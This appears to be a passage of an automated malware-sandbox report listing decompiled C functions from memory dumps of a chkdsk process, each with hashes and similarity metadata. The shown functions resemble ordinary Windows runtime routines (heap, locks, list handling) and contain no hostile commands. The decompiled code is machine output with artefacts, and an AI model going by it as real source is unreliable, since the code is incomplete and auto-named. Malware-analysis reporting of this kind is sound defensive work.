                                                      						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                      						 *_t34 = _t30;
                                                      						 *0x4e787e8 = _t30;
                                                      						 *0x4e787e0 = _t18 + 1;
                                                      					}
                                                      				}
                                                      				 *(_t38 - 4) = 0xfffffffe;
                                                      				return E04DDD0D1(L04E14320());
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 503bbfba1cbabf56c7ea9d85a540e4d4833ae7854765ca5456e718071e9e7e3d
                                                      • Instruction ID: 4b4c6f695e19d212834eb2ec5d59c1360046588715ec2d722fccfb6b743d48a9
                                                      • Opcode Fuzzy Hash: 503bbfba1cbabf56c7ea9d85a540e4d4833ae7854765ca5456e718071e9e7e3d
                                                      • Instruction Fuzzy Hash: 40215B70640602CFD715EF66D004A24BBF1FF9532AB2092AEC106DB3A4D735A881CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E04E046A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                      				signed short* _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v16;
                                                      				signed int _t22;
                                                      				signed char _t23;
                                                      				short _t32;
                                                      				void* _t38;
                                                      				char* _t40;
                                                      
                                                      				_v12 = __edx;
                                                      				_t29 = 0;
                                                      				_v8 = __ecx;
                                                      				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                      				_t38 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                      				if(_t38 != 0) {
                                                      					_t40 = _a4;
                                                      					 *_t40 = 1;
                                                      					E04DCF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                      					_t22 = _v12 >> 1;
                                                      					_t32 = 0x2e;
                                                      					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                      					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                      					_t23 = E04DBD268(_t38, 1);
                                                      					asm("sbb al, al");
                                                      					 *_t40 =  ~_t23 + 1;
                                                      					L04DA77F0(_v16, 0, _t38);
                                                      				} else {
                                                      					 *_a4 = 0;
                                                      					_t29 = 0xc0000017;
                                                      				}
                                                      				return _t29;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction ID: d42db0e03a14f294337db1b708ea7acf7ac8c2436dc5ffa30cfe3f45e5a095ea
                                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction Fuzzy Hash: 9A114872A04208BFDB059F5CD9808BEB7B9EF95304F1080AEF984C7390DA31AD51D7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 34%
                                                      			E04DB2397(intOrPtr _a4) {
                                                      				void* __ebx;
                                                      				void* __ecx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t11;
                                                      				void* _t19;
                                                      				void* _t25;
                                                      				void* _t26;
                                                      				intOrPtr _t27;
                                                      				void* _t28;
                                                      				void* _t29;
                                                      
                                                      				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                      				if( *0x4e7848c != 0) {
                                                      					L04DAFAD0(0x4e78610);
                                                      					if( *0x4e7848c == 0) {
                                                      						E04DAFA00(0x4e78610, _t19, _t27, 0x4e78610);
                                                      						goto L1;
                                                      					} else {
                                                      						_push(0);
                                                      						_push(_a4);
                                                      						_t26 = 4;
                                                      						_t29 = E04DB2581(0x4e78610, 0x4d650a0, _t26, _t27, _t28);
                                                      						E04DAFA00(0x4e78610, 0x4d650a0, _t27, 0x4e78610);
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					_t11 =  *0x4e78614; // 0x1
                                                      					if(_t11 == 0) {
                                                      						_t11 = E04DC4886(0x4d61088, 1, 0x4e78614);
                                                      					}
                                                      					_push(0);
                                                      					_push(_a4);
                                                      					_t25 = 4;
                                                      					_t29 = E04DB2581(0x4e78610, (_t11 << 4) + 0x4d65070, _t25, _t27, _t28);
                                                      				}
                                                      				if(_t29 != 0) {
                                                      					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                      					 *((char*)(_t29 + 0x40)) = 0;
                                                      				}
                                                      				return _t29;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9047cc8b0c9c1e2f52844c30f0d629421d3691c92e2b3ba1f864848ea88596b
                                                      • Instruction ID: 330e4fd2b96b51495dc3b46cbad33f263da4b0aeb94855da7dd436e1a4397435
                                                      • Opcode Fuzzy Hash: a9047cc8b0c9c1e2f52844c30f0d629421d3691c92e2b3ba1f864848ea88596b
                                                      • Instruction Fuzzy Hash: 76110833744300A7FB30AA2AAC9CB95B2D8FB60734F14489EE643A7351D5B4F84086A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 87%
                                                      			E04DC37F5(void* __ecx, intOrPtr* __edx) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed char _t6;
                                                      				intOrPtr _t13;
                                                      				intOrPtr* _t20;
                                                      				intOrPtr* _t27;
                                                      				void* _t28;
                                                      				intOrPtr* _t29;
                                                      
                                                      				_t27 = __edx;
                                                      				_t28 = __ecx;
                                                      				if(__edx == 0) {
                                                      					E04DA2280(_t6, 0x4e78550);
                                                      				}
                                                      				_t29 = E04DC387E(_t28);
                                                      				if(_t29 == 0) {
                                                      					L6:
                                                      					if(_t27 == 0) {
                                                      						E04D9FFB0(0x4e78550, _t27, 0x4e78550);
                                                      					}
                                                      					if(_t29 == 0) {
                                                      						return 0xc0000225;
                                                      					} else {
                                                      						if(_t27 != 0) {
                                                      							goto L14;
                                                      						}
                                                      						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                      						goto L11;
                                                      					}
                                                      				} else {
                                                      					_t13 =  *_t29;
                                                      					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                      						L13:
                                                      						_push(3);
                                                      						asm("int 0x29");
                                                      						L14:
                                                      						 *_t27 = _t29;
                                                      						L11:
                                                      						return 0;
                                                      					}
                                                      					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                      					if( *_t20 != _t29) {
                                                      						goto L13;
                                                      					}
                                                      					 *_t20 = _t13;
                                                      					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                      					asm("btr eax, ecx");
                                                      					goto L6;
                                                      				}
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9451cbec9bf9e362da9270790e7b889b5a6efef217942591d2e425ff2aed61d3
                                                      • Instruction ID: 48268775b140fa950ba1a659271e7280aa5adb6e65287a349b83a91c389ea7b0
                                                      • Opcode Fuzzy Hash: 9451cbec9bf9e362da9270790e7b889b5a6efef217942591d2e425ff2aed61d3
                                                      • Instruction Fuzzy Hash: D901D672A016129BD3378F5A9940E26BBB6EF86B60715806DED498B314D730FC01C7E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 42%
                                                      			E04D8C962(char __ecx) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* _t19;
                                                      				char _t22;
                                                      				void* _t26;
                                                      				void* _t27;
                                                      				char _t32;
                                                      				char _t34;
                                                      				void* _t35;
                                                      				void* _t37;
                                                      				intOrPtr* _t38;
                                                      				signed int _t39;
                                                      
                                                      				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                      				_v8 =  *0x4e7d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                      				_t34 = __ecx;
                                                      				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                      					_t26 = 0;
                                                      					E04D9EEF0(0x4e770a0);
                                                      					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                      					if(E04E0F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                      						L9:
                                                      						E04D9EB70(_t29, 0x4e770a0);
                                                      						_t19 = _t26;
                                                      						L2:
                                                      						_pop(_t35);
                                                      						_pop(_t37);
                                                      						_pop(_t27);
                                                      						return E04DCB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                      					}
                                                      					_t29 = _t34;
                                                      					_t26 = E04E0F1FC(_t34, _t32);
                                                      					if(_t26 < 0) {
                                                      						goto L9;
                                                      					}
                                                      					_t38 =  *0x4e770c0; // 0x0
                                                      					while(_t38 != 0x4e770c0) {
                                                      						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                      						_t38 =  *_t38;
                                                      						_v12 = _t22;
                                                      						if(_t22 != 0) {
                                                      							_t29 = _t22;
                                                      							 *0x4e7b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                      							_v12();
                                                      						}
                                                      					}
                                                      					goto L9;
                                                      				}
                                                      				_t19 = 0;
                                                      				goto L2;
                                                      			}



















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d60810df9e2400cb3d65ad72aa3adce7dbe16c9112d380e5104f9835182a9f4
                                                      • Instruction ID: 795bf05a3465bae15f09af5c52f905cdeb1eb83442195062518fe2baa6e738bf
                                                      • Opcode Fuzzy Hash: 4d60810df9e2400cb3d65ad72aa3adce7dbe16c9112d380e5104f9835182a9f4
                                                      • Instruction Fuzzy Hash: B111E5313006469BDB20EF69DC45AABB7E5FB84629F010529E98597690EB20FC54CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DB002D() {
                                                      				void* _t11;
                                                      				char* _t14;
                                                      				signed char* _t16;
                                                      				char* _t27;
                                                      				signed char* _t29;
                                                      
                                                      				_t11 = E04DA7D50();
                                                      				_t27 = 0x7ffe0384;
                                                      				if(_t11 != 0) {
                                                      					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      				} else {
                                                      					_t14 = 0x7ffe0384;
                                                      				}
                                                      				_t29 = 0x7ffe0385;
                                                      				if( *_t14 != 0) {
                                                      					if(E04DA7D50() == 0) {
                                                      						_t16 = 0x7ffe0385;
                                                      					} else {
                                                      						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                      					}
                                                      					if(( *_t16 & 0x00000040) != 0) {
                                                      						goto L18;
                                                      					} else {
                                                      						goto L3;
                                                      					}
                                                      				} else {
                                                      					L3:
                                                      					if(E04DA7D50() != 0) {
                                                      						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      					}
                                                      					if( *_t27 != 0) {
                                                      						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                      							goto L5;
                                                      						}
                                                      						if(E04DA7D50() != 0) {
                                                      							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                      						}
                                                      						if(( *_t29 & 0x00000020) == 0) {
                                                      							goto L5;
                                                      						}
                                                      						L18:
                                                      						return 1;
                                                      					} else {
                                                      						L5:
                                                      						return 0;
                                                      					}
                                                      				}
                                                      			}









                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction ID: 2905cee621fd57ad096fac4850dcd0fa14842e070e011beb350b7c805cd016d5
                                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction Fuzzy Hash: 10118232715A81CFE7239B24CD54B777794FB51758F0A00A1DE458B693E768F841C6A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E04D9766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                      				char _v8;
                                                      				void* _t22;
                                                      				void* _t24;
                                                      				intOrPtr _t29;
                                                      				intOrPtr* _t30;
                                                      				void* _t42;
                                                      				intOrPtr _t47;
                                                      
                                                      				_push(__ecx);
                                                      				_t36 =  &_v8;
                                                      				if(E04DBF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                      					L10:
                                                      					_t22 = 0;
                                                      				} else {
                                                      					_t24 = _v8 + __ecx;
                                                      					_t42 = _t24;
                                                      					if(_t24 < __ecx) {
                                                      						goto L10;
                                                      					} else {
                                                      						if(E04DBF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                      							goto L10;
                                                      						} else {
                                                      							_t29 = _v8 + _t42;
                                                      							if(_t29 < _t42) {
                                                      								goto L10;
                                                      							} else {
                                                      								_t47 = _t29;
                                                      								_t30 = _a16;
                                                      								if(_t30 != 0) {
                                                      									 *_t30 = _t47;
                                                      								}
                                                      								if(_t47 == 0) {
                                                      									goto L10;
                                                      								} else {
                                                      									_t22 = L04DA4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t22;
                                                      			}











                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction ID: cbda468ad5cac829b9e6007acea21068fa2c469c45ee3ebfafef90986719e347
                                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction Fuzzy Hash: AF018832710219EFDB61EE5ECC41E9B77EDEB84B60F150624B949CB250DA30ED0187B0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E04E1C450(intOrPtr* _a4) {
                                                      				signed char _t25;
                                                      				intOrPtr* _t26;
                                                      				intOrPtr* _t27;
                                                      
                                                      				_t26 = _a4;
                                                      				_t25 =  *(_t26 + 0x10);
                                                      				if((_t25 & 0x00000003) != 1) {
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push( *((intOrPtr*)(_t26 + 8)));
                                                      					_push(0);
                                                      					_push( *_t26);
                                                      					E04DC9910();
                                                      					_t25 =  *(_t26 + 0x10);
                                                      				}
                                                      				if((_t25 & 0x00000001) != 0) {
                                                      					_push(4);
                                                      					_t7 = _t26 + 4; // 0x4
                                                      					_t27 = _t7;
                                                      					_push(_t27);
                                                      					_push(5);
                                                      					_push(0xfffffffe);
                                                      					E04DC95B0();
                                                      					if( *_t27 != 0) {
                                                      						_push( *_t27);
                                                      						E04DC95D0();
                                                      					}
                                                      				}
                                                      				_t8 = _t26 + 0x14; // 0x14
                                                      				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                      				}
                                                      				_push( *_t26);
                                                      				E04DC95D0();
                                                      				return L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                      			}







                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction ID: 09f877353b1d44f90ba3b7228c96204d564a068402d7a7200997f490482d2087
                                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction Fuzzy Hash: 000180B2280506FFE721AF65CC94E62BB6DFB54398F104529F21483560CB31FCA0CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E04D89080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                      				intOrPtr* _t51;
                                                      				intOrPtr _t59;
                                                      				signed int _t64;
                                                      				signed int _t67;
                                                      				signed int* _t71;
                                                      				signed int _t74;
                                                      				signed int _t77;
                                                      				signed int _t82;
                                                      				intOrPtr* _t84;
                                                      				void* _t85;
                                                      				intOrPtr* _t87;
                                                      				void* _t94;
                                                      				signed int _t95;
                                                      				intOrPtr* _t97;
                                                      				signed int _t99;
                                                      				signed int _t102;
                                                      				void* _t104;
                                                      
                                                      				_push(__ebx);
                                                      				_push(__esi);
                                                      				_push(__edi);
                                                      				_t97 = __ecx;
                                                      				_t102 =  *(__ecx + 0x14);
                                                      				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                      					_t102 = _t102 | 0x000007d0;
                                                      				}
                                                      				_t48 =  *[fs:0x30];
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                      					_t102 = _t102 & 0xff000000;
                                                      				}
                                                      				_t80 = 0x4e785ec;
                                                      				E04DA2280(_t48, 0x4e785ec);
                                                      				_t51 =  *_t97 + 8;
                                                      				if( *_t51 != 0) {
                                                      					L6:
                                                      					return E04D9FFB0(_t80, _t97, _t80);
                                                      				} else {
                                                      					 *(_t97 + 0x14) = _t102;
                                                      					_t84 =  *0x4e7538c; // 0x776f6888
                                                      					if( *_t84 != 0x4e75388) {
                                                      						_t85 = 3;
                                                      						asm("int 0x29");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						_push(0x2c);
                                                      						_push(0x4e5f6e8);
                                                      						E04DDD0E8(0x4e785ec, _t97, _t102);
                                                      						 *((char*)(_t104 - 0x1d)) = 0;
                                                      						_t99 =  *(_t104 + 8);
                                                      						__eflags = _t99;
                                                      						if(_t99 == 0) {
                                                      							L13:
                                                      							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                      							if(__eflags == 0) {
                                                      								E04E588F5(_t80, _t85, 0x4e75388, _t99, _t102, __eflags);
                                                      							}
                                                      						} else {
                                                      							__eflags = _t99 -  *0x4e786c0; // 0x3007b0
                                                      							if(__eflags == 0) {
                                                      								goto L13;
                                                      							} else {
                                                      								__eflags = _t99 -  *0x4e786b8; // 0x0
                                                      								if(__eflags == 0) {
                                                      									goto L13;
                                                      								} else {
                                                      									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                      									__eflags =  *((char*)(_t59 + 0x28));
                                                      									if( *((char*)(_t59 + 0x28)) == 0) {
                                                      										E04DA2280(_t99 + 0xe0, _t99 + 0xe0);
                                                      										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                      										__eflags =  *((char*)(_t99 + 0xe5));
                                                      										if(__eflags != 0) {
                                                      											E04E588F5(0x4e785ec, _t85, 0x4e75388, _t99, _t102, __eflags);
                                                      										} else {
                                                      											__eflags =  *((char*)(_t99 + 0xe4));
                                                      											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                      												 *((char*)(_t99 + 0xe4)) = 1;
                                                      												_push(_t99);
                                                      												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                      												E04DCAFD0();
                                                      											}
                                                      											while(1) {
                                                      												_t71 = _t99 + 8;
                                                      												 *(_t104 - 0x2c) = _t71;
                                                      												_t80 =  *_t71;
                                                      												_t95 = _t71[1];
                                                      												 *(_t104 - 0x28) = _t80;
                                                      												 *(_t104 - 0x24) = _t95;
                                                      												while(1) {
                                                      													L19:
                                                      													__eflags = _t95;
                                                      													if(_t95 == 0) {
                                                      														break;
                                                      													}
                                                      													_t102 = _t80;
                                                      													 *(_t104 - 0x30) = _t95;
                                                      													 *(_t104 - 0x24) = _t95 - 1;
                                                      													asm("lock cmpxchg8b [edi]");
                                                      													_t80 = _t102;
                                                      													 *(_t104 - 0x28) = _t80;
                                                      													 *(_t104 - 0x24) = _t95;
                                                      													__eflags = _t80 - _t102;
                                                      													_t99 =  *(_t104 + 8);
                                                      													if(_t80 != _t102) {
                                                      														continue;
                                                      													} else {
                                                      														__eflags = _t95 -  *(_t104 - 0x30);
                                                      														if(_t95 !=  *(_t104 - 0x30)) {
                                                      															continue;
                                                      														} else {
                                                      															__eflags = _t95;
                                                      															if(_t95 != 0) {
                                                      																_t74 = 0;
                                                      																 *(_t104 - 0x34) = 0;
                                                      																_t102 = 0;
                                                      																__eflags = 0;
                                                      																while(1) {
                                                      																	 *(_t104 - 0x3c) = _t102;
                                                      																	__eflags = _t102 - 3;
                                                      																	if(_t102 >= 3) {
                                                      																		break;
                                                      																	}
                                                      																	__eflags = _t74;
                                                      																	if(_t74 != 0) {
                                                      																		L49:
                                                      																		_t102 =  *_t74;
                                                      																		__eflags = _t102;
                                                      																		if(_t102 != 0) {
                                                      																			_t102 =  *(_t102 + 4);
                                                      																			__eflags = _t102;
                                                      																			if(_t102 != 0) {
                                                      																				 *0x4e7b1e0(_t74, _t99);
                                                      																				 *_t102();
                                                      																			}
                                                      																		}
                                                      																		do {
                                                      																			_t71 = _t99 + 8;
                                                      																			 *(_t104 - 0x2c) = _t71;
                                                      																			_t80 =  *_t71;
                                                      																			_t95 = _t71[1];
                                                      																			 *(_t104 - 0x28) = _t80;
                                                      																			 *(_t104 - 0x24) = _t95;
                                                      																			goto L19;
                                                      																		} while (_t74 == 0);
                                                      																		goto L49;
                                                      																	} else {
                                                      																		_t82 = 0;
                                                      																		__eflags = 0;
                                                      																		while(1) {
                                                      																			 *(_t104 - 0x38) = _t82;
                                                      																			__eflags = _t82 -  *0x4e784c0;
                                                      																			if(_t82 >=  *0x4e784c0) {
                                                      																				break;
                                                      																			}
                                                      																			__eflags = _t74;
                                                      																			if(_t74 == 0) {
                                                      																				_t77 = E04E59063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                      																				__eflags = _t77;
                                                      																				if(_t77 == 0) {
                                                      																					_t74 = 0;
                                                      																					__eflags = 0;
                                                      																				} else {
                                                      																					_t74 = _t77 + 0xfffffff4;
                                                      																				}
                                                      																				 *(_t104 - 0x34) = _t74;
                                                      																				_t82 = _t82 + 1;
                                                      																				continue;
                                                      																			}
                                                      																			break;
                                                      																		}
                                                      																		_t102 = _t102 + 1;
                                                      																		continue;
                                                      																	}
                                                      																	goto L20;
                                                      																}
                                                      																__eflags = _t74;
                                                      															}
                                                      														}
                                                      													}
                                                      													break;
                                                      												}
                                                      												L20:
                                                      												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                      												 *((char*)(_t99 + 0xe5)) = 1;
                                                      												 *((char*)(_t104 - 0x1d)) = 1;
                                                      												goto L21;
                                                      											}
                                                      										}
                                                      										L21:
                                                      										 *(_t104 - 4) = 0xfffffffe;
                                                      										E04D8922A(_t99);
                                                      										_t64 = E04DA7D50();
                                                      										__eflags = _t64;
                                                      										if(_t64 != 0) {
                                                      											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      										} else {
                                                      											_t67 = 0x7ffe0386;
                                                      										}
                                                      										__eflags =  *_t67;
                                                      										if( *_t67 != 0) {
                                                      											_t67 = E04E58B58(_t99);
                                                      										}
                                                      										__eflags =  *((char*)(_t104 - 0x1d));
                                                      										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                      											__eflags = _t99 -  *0x4e786c0; // 0x3007b0
                                                      											if(__eflags != 0) {
                                                      												__eflags = _t99 -  *0x4e786b8; // 0x0
                                                      												if(__eflags == 0) {
                                                      													_t94 = 0x4e786bc;
                                                      													_t87 = 0x4e786b8;
                                                      													goto L27;
                                                      												} else {
                                                      													__eflags = _t67 | 0xffffffff;
                                                      													asm("lock xadd [edi], eax");
                                                      													if(__eflags == 0) {
                                                      														E04D89240(_t80, _t99, _t99, _t102, __eflags);
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t94 = 0x4e786c4;
                                                      												_t87 = 0x4e786c0;
                                                      												L27:
                                                      												E04DB9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                      											}
                                                      										}
                                                      									} else {
                                                      										goto L13;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						return E04DDD130(_t80, _t99, _t102);
                                                      					} else {
                                                      						 *_t51 = 0x4e75388;
                                                      						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                      						 *_t84 = _t51;
                                                      						 *0x4e7538c = _t51;
                                                      						goto L6;
                                                      					}
                                                      				}
                                                      			}





















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50fc8dd8bbb5cf760fc32bc5a39c934832f7ab9f7d15bcf1dc3fb76872f61213
                                                      • Instruction ID: 372ebfdba540fe71c9268b6186eae605c4c166088546414dc2fb12fc1b3d2340
